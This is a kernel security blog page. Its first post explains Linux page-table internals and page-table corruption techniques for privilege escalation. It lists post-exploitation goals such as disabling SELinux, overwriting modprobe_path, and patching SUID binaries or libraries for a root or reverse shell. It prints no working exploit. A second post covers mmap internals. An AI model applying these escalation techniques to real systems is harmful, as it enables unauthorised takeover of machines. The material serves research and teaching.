sam4k

Kernel Exploitation Techniques: Turning The (Page) Tables

sam4k — Wed, 07 May 2025 14:01:41 +0000

Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.

So today we’ll be looking at (user) page table exploitation. If you’ve been keeping up with some of the great kernel exploitation research put out there lately (plenty of which I’ll be sharing in this article, don’t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.

The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We’ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.

As I mentioned, there’s a plethora of great research out there, so where relevant I’ll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I’ll include a section grouping all the relevant public research together.

So without further ado, let’s get stuck in!

Paging Primer
Exploitation
Mitigations
- Physical KASLR
- Read-Only Memory
Resources
Wrapping Up

Paging Primer

he’s looking at pages, get it?

Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what page tables are so we understand why exploiting them is so powerful.

Let’s pick up where we left off with my three-part series on virtual memory; if you’re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.

Okay, so, we have this general idea of the virtual memory model. Let’s take the simple example of running a program, which we’ve touched on previously:

First, the program itself is stored on disk and must be read
It is loaded into RAM, where the physical address in memory is mapped into our process’ virtual address space
This “mapping” means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed

Page tables are what facilitate the translation of virtual to physical addresses. Why “page” tables? Recall that virtual memory is divided into “pages” which are PAGE_SIZE (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.

Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?

Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels[1]:

Page Global Directory (PGD): Each entry in this table points to a P4D
Page Level 4 Directory (P4D): Each entry in this table points to a PUD
Page Upper Directory (PUD): Each entry in this table points to a PMD
Page Middle Directory (PMD): Each entry in this table points to a PT
Page Table (PT): Each entry (PTE) points to a page of physical memory

Note that a lot of systems may still use 4 level page tables. In the event a page table level isn’t used (i.e. P4D is only used for 5 level page tables), it is “folded” AKA skipped.

Okay, that sounds fairly straightforward, right? And to add to the page-ception, each of these tables is PAGE_SIZE bytes. But how do these facilitate address translation?

Overview of page table structure (Linux x86_64) by Hiroki Kuzuno, Toshihiro Yamauchi [1]

That’s where this helpful diagram comes in! Let’s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.

Looking up, we can see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn’t that neat?!

There are a few extra details to note here. First, keen readers might notice that we’re actually only using the lower 48 bits (0-47) of the virtual address! What’s that Sign extended portion? As addresses are canonically 64 bits (i.e. that’s how they’re treated and handled), the remaining bits 48-63 are sign extended from (i.e. copies of) bit 47.

This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don’t believe me? Compare a kernel and userspace address on your x86_64 machine and you’ll always see those bits set/unset.

Some more useful bits (figuratively speaking) worth mentioning are that:

Page table entries aren’t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).
It’s not just PTEs that can point to physical memory. There’s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).
The kernel’s page tables are setup at boot time. A process’ page tables are setup when it’s created. It used to be the case that the kernel’s page tables were copied into each process’ tables (remember, they span a mutually exclusive virtual address range).
However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, [CONFIG_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html) / [CONFIG_MITIGATION_PAGE_TABLE_ISOLATION](https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html)) was introduced. This removes the kernel mappings from userspace, switching to a separate page table with all the mappings when entering “kernel mode” (i.e. during a syscall or interrupt).

I’ll touch on all of this in much more detail in the next instalment of my memory management linternals series, but there’s also plenty of great resources out there[1][2].

Exploitation

Alright, now we’re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.

Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.

When we think of Kernel Address Space Layout Randomisation (KASLR), we’re typically thinking about the virtual address of the kernel. Physical KASLR is slightly different: it may not be present at all (as is the case on upstream aarch64) or it may be weaker.

Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.

But of course, this is all easier said than done! First we have to control a PTE…

So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:

How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them
Are there generic approaches to gain a page table corruption primitive?
How do we want to leverage our page table corruption for local privilege escalation?

User Page Table Allocation

If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel’s page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.

I’ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated.

We can use some maths to trigger this reliably. Recall that each page table is PAGE_SIZE bytes. On a 64-bit system, entries are 64 bits. That means each page table has 4096 / 8 = 512 entries. We can then work out the virtual address range of each page table level:

PTE-level table: Each of the 512 entries points to PAGE_SIZE bytes of physical memory. Therefore it spans 512 x 4096 = 2097152 = 0x200000 = 2MB.
Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans 0x40000000 = 1GB
This continues with the PUD spanning 512GB, the PGD spanning 256TB.

We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to 0x200000. If we mmap() a page of anonymous memory to a fixed address aligned to this value, we can determine a few things:

This virtual address’ mapping will be the first entry in its PTE-level table
If there haven’t been any other mappings in this page table (i.e. for the next 0x200000 - 0x1000 bytes), then this page table hasn’t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.

Another quirk to note is that mmap() can be passed the MAP_POPULATE flag to populate the necessary page tables at the time the mapping is created.

With that mildly relevant tangent out of the way, let’s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For x86_64 our trail starts here:

gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}

arch/x86/mm/pgtable.c

Note the GFP flags used: GFP_PGTABLE_USER | PGTABLE_HIGHMEM. A few calls deeper we then get to the asm-generic implementation, pagetable_alloc_noprof():

/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}

include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)

As we can see user page tables are allocated using the page allocator, with GFP flags GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP. Okay, one step closer!

Now we know we’re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let’s explore this a bit:

GPUAF slides by PAN ZHENPENG & JHENG BING JHONG

Above is a diagram showing some page allocator internals. Recall that the page allocator manages chunks of physically contiguous memory by order, where the size of the chunk is 2^order * PAGE_SIZE.

Free memory chunks are managed by the free_area list, whose index is the order of the free chunks of memory it manages. Each order then has a free_list for each of the MIGRATE_TYPES, which points to the actual memory chunks. Working our way back you’ll then notice each zone has its own free_area list… Not to mention each CPU maintains its own per-CPU page cache… So yeah, that’s a lot.

This means when we’re doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.

In our situation: Our page table is PAGE_SIZE bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let’s quickly walk through those:

GFP_PGTABLE_USER after peeling back the macros is __GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT. No __GFP_RECLAIMABLE|__GFP_MOVABLE means no MIGRATE_MOVABLE[3].
PGTABLE_HIGHMEM is effectively 0 unless CONFIG_HIGHMEM is set.
__GFP_COMP is for compound pages[4], but doesn’t affect our zone/migrate type.

So to sum it all up: page tables are order-0 pages allocated by the page allocator, from ZONE_NORMAL, MIGRATE_UNMOVABLE.

Page Table Corruption?

Okay, we know what page tables are, why they’re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!

The vulnerability research gods are fickle ones and we’re often at the whims of the primitives we’re given. So let’s explore a few cases and how we might leverage them to get control of a page table.

Page-Level Primitives

By far the “easiest” way would be if we had a nice order-0 page use-after-free (UAF), with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.

Even if it wasn’t an order-0 page, due to the buddy algorithm, if we exhaust the order-0 pages the allocator will split order-1 pages, if they’re exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.

I thought I’d share some cool public research demonstrating this. Funnily enough, page-level UAFs aren’t too common, so both examples are from GPU bugs:

GPUAF - Two ways of Rooting All Qualcomm based Android phones (aarch64)
The Way to Android Root: Exploiting Your GPU On Smartphone (aarch64)

What About Other Primitives?

But what if we don’t have a nice page-level UAF? What if we’ve got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!

As an avid reader of my linternals series, I’m sure you’ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!

Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We’d need to be mindful of the slab’s order (aka size) and what write primitives we can get with our UAF in order to corrupt the page table’s contents, but it’s certainly doable.

How do I know? Because this is the crux of the Dirty Pagetable technique published by @NVamous back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!

In a similar vein, PageJack was published in 2024 (Phrack article, BlackHat slides) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen & Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific “bridge objects” which when freed cause a page UAF.

Below are some more writeups demonstrating these techniques:

“Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup” by @ptrYudai (x86_64) (2023)
“Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques” by @notselwyn expands on the Dirty Pagetable technique (x86_64) (2024)

Exploiting A Page UAF?

The pieces are finally aligned: we know what page tables are, why they’re a big deal and now we even know how to get control of them … but what do we do with all this power?!

As I mentioned earlier, we’re often at the whims of whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can’t cover all eventualities, hopefully this section provides enough information to figure it out.

So we have, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what’s next?

PT Entries

First things first, we want to understand what we’re corrupting - what does our page table actually contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?

x86_64 PT Entry from OSDev.wiki

Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here M is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched on earlier, this isn’t actually 64, but a smaller value such as 47.

So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. PAGE_SIZE bytes of memory), so all addresses are page aligned. With a page size of 0x1000, this means bits 0-11 are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.

Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our process’s virtual address space. So we’re interested in:

The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.
The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.

Huge Pages

As we’ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.

That said, in their default use case, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables … Apart from huge pages!

x86_64 PUD, PMD and PT Entry from OSDev.wiki

The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (PS) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, whose size is appropriate for the page level.

As we covered earlier, for a PMD this is 2MB and for a PUD it’s 1GB. As the physical addresses are aligned to the size of the mapping, we can see the PMD entry has even fewer address bits than the PT entry, and the PUD fewer still.

Going For A Walk

So far this has been all quite abstract, so, if you’ll indulge me, let’s go for a quick (page table) walk. We’ll take all the paging internals we’ve picked up so far to do some debugging in order to get hands-on and confirm what we’ve learned.

For our little walk, I’m going to use the following program to setup an interesting virtual address space to explore via kernel debugging:

#include <fcntl.h>    // open(), O_RDONLY
#include <stdio.h>    // getchar()
#include <sys/mman.h> // mmap(), PROT_*, MAP_*

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open("test.txt", O_RDONLY);

    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE), 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE), 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE), 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so i can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}

Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them

The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?

Because as we’ve learned, the virtual address space is directly reflected by its page tables. So by using a fixed address we can calculate exactly which PT our page entries will be in.

To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address 0x0 is going to be mapped by PGD[0][0][0][0] - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.

So if we map at fixed address PUD_SIZE + PMD_SIZE + PT_SIZE we’re offsetting it by exactly one PUD, one PMD and one PT. So we should find it at PGD[1][1][1][0].

We can also do it the technical way and explore the bits of the address. PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000. Let’s check out the bits:

Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0

In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits 39-47, 30-38, 21-29 and 12-20 respectively. Here we can see those values correspond to 1, 1, 1 and 0. The same as our previous guess!

Note that the next two mappings are each offset by PAGE_SIZE, i.e. one PT entry, so they should form 3 contiguous PT entries.

This is all still theoretical though so let’s put our money where our mouth is. I set up a kernel debugging environment using gdb and x86_64 QEMU. The plan is to:

Run this program on the guest
When it pauses at getchar(), set a breakpoint in gdb at vm_area_alloc(mm)
Continue the program, hit the breakpoint. We now, lazily, have a reference to our process’s mm_struct which contains a pointer to its PGD. We can now walk our PGD and find our entries!

And, just like that we can dump our process’s PGD:

(gdb) x/10gx mm->pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000

Great, so far so good. We can see PGD[1] is populated with 0x8000000102c9b067. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: 0x8000000102c9b067 & 0x0000FFFFFFFFF000 = 0x102C9B000.

Awesome, so now we can move onto our PUD…

(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000

Ah wait, that’s a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the kernel virtual address space includes a direct mapping of all physical memory (physmap). For x86_64 this is at __PAGE_OFFSET, by default 0xffff888000000000 with 4-level paging.

Sooo if that’s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PUD…

(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067

Voila! And again, as expected, we have our entry at PGD[1][1]. Let’s keep going:

(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 & 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067

Now we’re into the PMD and as expected, we see PGD[1][1][1] populated. The next step is the PT, where we should see three entries with slightly different permissions:

(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 & 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
0xffff888101346010:     0x800000010743c025      0x0000000000000000

And just like that we’ve walked our mm’s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!

I’ll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I’ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get hands-on with debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!

Now, where were we - weighing up our options for exploitation if we have some level of control over a page table…

Approaches

So, depending on our primitive, here are a couple of options we might consider:

Overwriting the address bits (and maybe Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we’ll discuss phys KASLR later).
Overwriting permissions bits to gain R/W on a privileged file that is mapped into our process’s virtual address space as read-only.

Using our kernel arbitrary address write (AAW) we could: disable SELinux, using one of the techniques outlined here, such as overwriting the selinux_state singleton[3][4]; patch the kernel to gain root (e.g. setresuid(), setresgid())[5][6]; overwrite modprobe_path, because that’s sometimes still a thing[7]; or follow the linked list of tasks from [init_task](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58) to elevate the privileges of our own [cred](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111)s or forge init’s, etc. The world is our oyster (if our primitive is flexible enough…)!

As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell[8][9][10]; patch SUID binaries to gain a privileged shell etc.

On Caching

Before we get giddy with power, beyond the limitations of our primitive, there are a few other things to consider: mitigations (which I’ll cover in the next section) and caching.

So far we’ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.

This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we’re constantly accessing the same pages of memory.

To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.

If we start messing with page table entries or pages, in order for the hardware to actually see these changes, we need to flush the appropriate caches so they’re updated with our version.

Of the write-ups I’ve mentioned so far, the Dirty Pagetable article has a section on this for aarch64 and the Flipping Pages article has a section relevant to x86_64.

Mitigations

Alright, we’ve had our fun, now it’s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps more common mitigations: virtual KASLR, CFI, random kmalloc caches and other heap mitigations, and it doesn’t rely on modprobe_path; not to mention the permissions set up by page tables to protect memory accesses via virtual addresses. However, that’s not to say there’s nothing to worry about.

Physical KASLR

As I mentioned earlier, usually when we’re talking about Kernel Address Space Layout Randomisation (KASLR), we’re referring to kernel virtual address randomisation. However, as we’re dealing with physical addresses, we’re interested in physical KASLR.

[CONFIG_RANDOMIZE_BASE](https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html) is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:

In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.

On 64-bit, the kernel physical and virtual addresses are randomized separately.

Now, let’s look at the aarch64 description:

Randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you’re on Android, you’re not out of the woods yet - Samsung have their own physical KASLR implementation, so don’t stop reading just yet.

For x86_64, the kernel’s physical base address is aligned to [CONFIG_PHYSICAL_START](https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html) (default being 0x1000000). However, the physical address alignment can be explicitly defined by [CONFIG_PHYSICAL_ALIGN](https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html), which is typically set to 0x200000 (which is the minimum value on x86_64).

Sooo how we approach this is going to depend on our primitive and whether we have control of a PT, PMD, PUD etc. But failing any context-specific leaks, the most straightforward approach is simply brute forcing the available physical memory, taking advantage of alignment restrictions: reading the possible base addresses for known signatures, either by updating PT entries or by mapping huge pages of physical memory and doing it that way.

Read-Only Memory

Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we’re dealing directly with physical addresses here, who’s going to stop us?! As we’ve mentioned, typically these protections are done during virtual address translation, but we’re bypassing that, so what gives?

An example of this is Samsung’s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of Samsung KNOX. I don’t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.

Moreover, it uses a 2 stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, it can still be caught by the hypervisor as it’s operating at a higher privilege. This is a gross simplification, so if you’re interested in reading more, check out the awesome Samsung RKP Compendium.

This can in turn be used to protect critical data structures such as SLAB caches (e.g. cred_jar), global variables, kernel page tables etc.

Note this isn’t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.

Resources

Below is a list of all the resources I’ve linked throughout the article and any extras that are relevant to the topic of page table exploitation (if you think I’ve missed any, lmk!):

Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel by @NVamous (2023) (aarch64) technique overview with 3 examples
“Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup” by @ptrYudai (2023) (x86_64) exploit write-up
“Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques” by @notselwyn (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing
PageJack (Phrack article, BlackHat slides) (2024) technique overview
GPUAF - Two ways of Rooting All Qualcomm based Android phones (2024) (aarch64) exploit slides
The Way to Android Root: Exploiting Your GPU On Smartphone (2024) (aarch64) exploit slides
CVE-2022-22265 Samsung npu driver (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX
Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793) (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries

RE internals and more background reading:

Page Tables - Linux Kernel Docs are a good place to start on fundamentals
Check out my Linternals series for rundowns on page allocators and mm basics
A Quick Dive Into The Linux Kernel Page Allocator (2025) is a great look into the kernel’s page allocator

Wrapping Up

Boom, we did it! This has been a fun one to write, hopefully it’s, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.

It’s part of the broader cat and mouse game of security research: as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we’ve seen, by exploiting page tables and using physical memory addressing, we’re essentially able to operate “under” the purview of traditional mitigations, such as the permission checks done at the virtual address level.

That said, it’s not quite the wild west as, while not widespread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!

If you’re interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I’ll be touching on that in the next part of my mm series.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

Linternals: Exploring The mm Subsystem via mmap [0x02]

sam4k — Fri, 25 Apr 2025 15:17:34 +0000

Welcome back! Last time I left us on a bit of a cliffhanger, rolling the credits just as we were getting into the thick of it, so I’ll keep the intro brief.

The aim of this series is to explore the inner workings of the Linux kernel’s memory management (mm) subsystem by examining how this simple program is implemented:

#include <sys/mman.h>

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}

While I’m making up the scope of this series as I go (seems fine), the general idea is to cover the mapping, writing and unmapping of memory in detail as the kernel sees it.

In the first part of the series we covered:

What memory management is and a brief overview of the kernel’s mm subsystem
What our simple program does from the user’s perspective and how it interacts with the kernel (it’s only like 2 syscalls, how much could there be to cover…)
The start of our journey: how memory is mapped via the mmap() system call - argument marshalling, fetching the mm_struct, a bit of security, locking - right up until the actual implementation in do_mmap() anyway (sorry, that really was a cliffhanger)

So without further ado, let’s dive back into how (anonymous) memory is mapped via mmap()!

Mapping Memory (cont.)
Next Time

Mapping Memory (cont.)

Broadly speaking, there are 3 things happening in our program: mapping some anonymous memory, writing to it and then unmapping it. Currently, we’re digging into the first part:

addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

Let’s quickly recap how deep in the mm subsystem we are, since making our mmap(2) system call from our userspace program. Using gdb we can set a breakpoint on do_mmap(), which is where we left off, and check the backtrace:

(gdb) bt
#0  do_mmap (file=file@entry=0x0 , addr=0, len=4096, prot=3, flags=34, vm_flags=vm_flags@entry=0, pgoff=0, 
    populate=0xffffc90001a17e80, uf=0xffffc90001a17ea0) at mm/mmap.c:1215
#1  0xffffffff8162aabc in vm_mmap_pgoff (file=file@entry=0x0 , addr=, len=, 
    prot=, flag=, pgoff=) at mm/util.c:556
#2  0xffffffff816a4d7c in ksys_mmap_pgoff (addr=0, len=4096, prot=3, flags=34, fd=, pgoff=0) at mm/mmap.c:1427
#3  0xffffffff810a894f in __do_sys_mmap (addr=0, off=, len=, prot=, flags=, 
    fd=) at arch/x86/kernel/sys_x86_64.c:93
#4  0xffffffff8100507f in x64_sys_call (regs=regs@entry=0xffffc90001a17f58, nr=nr@entry=9) at arch/x86/entry/syscall_64.c:29
#5  0xffffffff844328b1 in do_syscall_x64 (regs=0xffffc90001a17f58, nr=) at arch/x86/entry/common.c:51
#6  do_syscall_64 (regs=0xffffc90001a17f58, nr=) at arch/x86/entry/common.c:81
#7  0xffffffff84600130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

backtrace for our program’s mmap() call (on a 6.11.5 kernel)

So far these functions have mostly been sanitising arguments, doing necessary security checks and taking the all-important [mmap_write_lock_killable(mm)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117).

Before we continue where we left off, about to dive into [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3410), I’m going to touch on some key background which will provide important context for the rest of the post!

What Are Mappings?

We probably shouldn’t go much further down the memory mapping rabbit hole without first covering what a mapping is, or at least how the kernel represents them.

When we call [mmap()](https://man7.org/linux/man-pages/man2/mmap.2.html) in our userspace program, we’re looking to “map” some memory into our virtual address space. This could be a file or some anonymous memory (aka physical memory allocated for us to use), which can then be accessed via a virtual address in our process’s virtual address space.

So a mapping in this context is essentially a virtual address range which is mapped to some physical memory. We can explore a process’s mappings via procfs. Let’s see if we can find our program’s 0x1000 byte mapping:

$ cat /proc/91280/maps
00400000-00401000 r--p 00000000 00:2b 12253872                           mm_example
00401000-0047c000 r-xp 00001000 00:2b 12253872                           mm_example
0047c000-004a4000 r--p 0007c000 00:2b 12253872                           mm_example
004a4000-004a9000 r--p 000a3000 00:2b 12253872                           mm_example
004a9000-004ab000 rw-p 000a8000 00:2b 12253872                           mm_example
004ab000-004b1000 rw-p 00000000 00:00 0 
15b3e000-15b60000 rw-p 00000000 00:00 0                                  [heap]
7f556e60a000-7f556e60b000 rw-p 00000000 00:00 0 
7f556e60b000-7f556e60d000 r--p 00000000 00:00 0                          [vvar]
7f556e60d000-7f556e60f000 r--p 00000000 00:00 0                          [vvar_vclock]
7f556e60f000-7f556e611000 r-xp 00000000 00:00 0                          [vdso]
7ffd933f4000-7ffd93415000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

We can see even our simple program has quite a few mappings, but let’s not get distracted! There, at 7f556e60a000, we can see our anonymous mapping! It spans 0x1000 bytes and has the rw permissions we expect, neat!
